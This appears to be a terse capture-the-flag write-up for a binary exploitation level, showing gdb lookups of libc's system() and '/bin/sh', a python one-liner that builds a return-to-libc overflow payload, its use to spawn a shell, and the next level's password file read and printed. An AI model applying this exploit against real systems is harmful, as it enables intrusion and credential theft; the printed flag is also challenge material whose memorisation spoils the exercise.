# GDB
(gdb) break p
(gdb) run
(gdb) print system
  $1 = {<text variable, no debug info>} 0xb7e6b060 <system>
(gdb) info proc map
  Start Addr   End Addr       Size     Offset objfile
  [...]
  0xb7e2c000 0xb7fcf000   0x1a3000        0x0 /lib/i386-linux-gnu/libc-2.15.so
  [...]
find 0xb7e2c000, 0xb7fcf000, "/bin/sh"
  0xb7f8cc58
  1 pattern found.

# Random RET
080484d2 c3              RET

#                            ... RET              ... system                    ... "/bin/sh"
python2.7 -c 'print("X"*80 + "\xd2\x84\x04\x08" + "\x60\xb0\xe6\xb7" + "XXXX" + "\x58\xcc\xf8\xb7")' > /tmp/exploit.txt
cat /tmp/exploit.txt /dev/stdin | ./level2
cat /home/user/level3/.pass
492deb0e7d14c4b5695173cca843c4384fe52d0857c2b0718e1a521a4d33ec02
